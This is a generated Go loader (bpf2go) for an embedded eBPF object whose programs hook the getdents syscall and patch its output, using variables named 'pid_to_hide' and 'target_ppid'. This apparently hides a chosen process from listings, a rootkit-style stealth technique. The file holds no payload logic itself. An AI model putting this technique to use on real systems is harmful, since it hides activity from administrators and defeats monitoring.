// Code generated by bpf2go; DO NOT EDIT.
//go:build mips || mips64 || ppc64 || s390x

package agent_helper

import (
	"bytes"
	_ "embed"
	"fmt"
	"io"

	"github.com/cilium/ebpf"
)

// Names of all BPF objects in the ELF.
//
// Used for safe lookups in a Collection or CollectionSpec.
const (
	bpfMapMapBuffs             = "map_buffs"
	bpfMapMapBytesRead         = "map_bytes_read"
	bpfMapMapProgArray         = "map_prog_array"
	bpfMapMapToPatch           = "map_to_patch"
	bpfMapRb                   = "rb"
	bpfProgHandleGetdentsEnter = "handle_getdents_enter"
	bpfProgHandleGetdentsExit  = "handle_getdents_exit"
	bpfProgHandleGetdentsPatch = "handle_getdents_patch"
	bpfVarPidToHide            = "pid_to_hide"
	bpfVarPidToHideLen         = "pid_to_hide_len"
	bpfVarTargetPpid           = "target_ppid"
)

// loadBpf returns the embedded CollectionSpec for bpf.
func loadBpf() (*ebpf.CollectionSpec, error) {
	reader := bytes.NewReader(_BpfBytes)
	spec, err := ebpf.LoadCollectionSpecFromReader(reader)
	if err != nil {
		return nil, fmt.Errorf("can't load bpf: %w", err)
	}

	return spec, err
}

// loadBpfObjects loads bpf and converts it into a struct.
//
// The following types are suitable as obj argument:
//
//	*bpfObjects
//	*bpfPrograms
//	*bpfMaps
//
// See ebpf.CollectionSpec.LoadAndAssign documentation for details.
func loadBpfObjects(obj any, opts *ebpf.CollectionOptions) error {
	spec, err := loadBpf()
	if err != nil {
		return err
	}

	return spec.LoadAndAssign(obj, opts)
}

// bpfSpecs contains maps and programs before they are loaded into the kernel.
//
// It can be passed ebpf.CollectionSpec.Assign.
type bpfSpecs struct {
	bpfProgramSpecs
	bpfMapSpecs
	bpfVariableSpecs
}

// bpfProgramSpecs contains programs before they are loaded into the kernel.
//
// It can be passed ebpf.CollectionSpec.Assign.
type bpfProgramSpecs struct {
	HandleGetdentsEnter *ebpf.ProgramSpec `ebpf:"handle_getdents_enter"`
	HandleGetdentsExit  *ebpf.ProgramSpec `ebpf:"handle_getdents_exit"`
	HandleGetdentsPatch *ebpf.ProgramSpec `ebpf:"handle_getdents_patch"`
}

// bpfMapSpecs contains maps before they are loaded into the kernel.
//
// It can be passed ebpf.CollectionSpec.Assign.
type bpfMapSpecs struct {
	MapBuffs     *ebpf.MapSpec `ebpf:"map_buffs"`
	MapBytesRead *ebpf.MapSpec `ebpf:"map_bytes_read"`
	MapProgArray *ebpf.MapSpec `ebpf:"map_prog_array"`
	MapToPatch   *ebpf.MapSpec `ebpf:"map_to_patch"`
	Rb           *ebpf.MapSpec `ebpf:"rb"`
}

// bpfVariableSpecs contains global variables before they are loaded into the kernel.
//
// It can be passed ebpf.CollectionSpec.Assign.
type bpfVariableSpecs struct {
	PidToHide    *ebpf.VariableSpec `ebpf:"pid_to_hide"`
	PidToHideLen *ebpf.VariableSpec `ebpf:"pid_to_hide_len"`
	TargetPpid   *ebpf.VariableSpec `ebpf:"target_ppid"`
}

// bpfObjects contains all objects after they have been loaded into the kernel.
//
// It can be passed to loadBpfObjects or ebpf.CollectionSpec.LoadAndAssign.
type bpfObjects struct {
	bpfPrograms
	bpfMaps
	bpfVariables
}

func (o *bpfObjects) Close() error {
	return _BpfClose(
		&o.bpfPrograms,
		&o.bpfMaps,
	)
}

// bpfMaps contains all maps after they have been loaded into the kernel.
//
// It can be passed to loadBpfObjects or ebpf.CollectionSpec.LoadAndAssign.
type bpfMaps struct {
	MapBuffs     *ebpf.Map `ebpf:"map_buffs"`
	MapBytesRead *ebpf.Map `ebpf:"map_bytes_read"`
	MapProgArray *ebpf.Map `ebpf:"map_prog_array"`
	MapToPatch   *ebpf.Map `ebpf:"map_to_patch"`
	Rb           *ebpf.Map `ebpf:"rb"`
}

func (m *bpfMaps) Close() error {
	return _BpfClose(
		m.MapBuffs,
		m.MapBytesRead,
		m.MapProgArray,
		m.MapToPatch,
		m.Rb,
	)
}

// bpfVariables contains all global variables after they have been loaded into the kernel.
//
// It can be passed to loadBpfObjects or ebpf.CollectionSpec.LoadAndAssign.
type bpfVariables struct {
	PidToHide    *ebpf.Variable `ebpf:"pid_to_hide"`
	PidToHideLen *ebpf.Variable `ebpf:"pid_to_hide_len"`
	TargetPpid   *ebpf.Variable `ebpf:"target_ppid"`
}

// bpfPrograms contains all programs after they have been loaded into the kernel.
//
// It can be passed to loadBpfObjects or ebpf.CollectionSpec.LoadAndAssign.
type bpfPrograms struct {
	HandleGetdentsEnter *ebpf.Program `ebpf:"handle_getdents_enter"`
	HandleGetdentsExit  *ebpf.Program `ebpf:"handle_getdents_exit"`
	HandleGetdentsPatch *ebpf.Program `ebpf:"handle_getdents_patch"`
}

func (p *bpfPrograms) Close() error {
	return _BpfClose(
		p.HandleGetdentsEnter,
		p.HandleGetdentsExit,
		p.HandleGetdentsPatch,
	)
}

func _BpfClose(closers ...io.Closer) error {
	for _, closer := range closers {
		if err := closer.Close(); err != nil {
			return err
		}
	}
	return nil
}

// Do not access this directly.
//
//go:embed bpf_bpfeb.o
var _BpfBytes []byte
